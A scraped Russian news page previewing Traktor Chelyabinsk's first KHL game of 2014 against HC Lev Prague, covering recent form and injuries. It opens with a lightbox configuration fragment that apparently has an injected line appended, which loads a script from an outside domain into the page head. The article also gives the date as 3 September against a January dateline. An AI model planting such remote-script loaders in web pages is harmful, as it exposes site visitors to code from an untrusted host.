, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

«Трактор» начинает 2014 год поединком против пражского «Льва»

"Трактор" начинает новый хоккейный год встречей с пражским "Львом"

Сегодня, 3 сентября, на домашней арене черно-белые проведут первый поединок в 2014 году. Соперником челябинцев станет "Лев" из Праги. Чешский коллектив весьма успешно выступает в нынешнем сезоне. "Лев" уверенно держится в зоне плей-офф и борется за самые высокие места в Западной конференции. В трех предыдущих матчах чехи одержали три победы, в том числе разгромили "Слован" из Братиславы со счетом 7:0.

"Трактор" же, напротив, за исключением последнего в 2013 году поединка с "Северсталью", проиграл в шести матчах подряд. Черно-белые пока находятся за пределами зоны плей-офф, занимая 9 место в турнирной таблице Восточной конференции. Для того, чтобы пробиться в заветную восьмерку лучших команд Востока, "Трактору" сейчас нужно цепляться за очки в любом матче, тем более на домашнем льду.

В матче со "Львом" не примут участие травмированный Евгений Кузнецов и Вячеслав Основин, который с составе сборной России борется за медали молодежного Чемпионата мира. Под вопросом также выход на лед нападающего Яна Булиса. Чех только что оправился после травмы, из-за которой пропустил несколько последних матчей.

Начало поединка на ледовой арене "Трактор" - в 17:00.

Новости
0 rating, 0 votes0 rating, 0 votes Запрещено!
Loading...Loading...
15:23 - 03 января 2014
|
автор: U-RSS
|
(671)
|
(0)

Комментарии (0)

Я человек
Я бот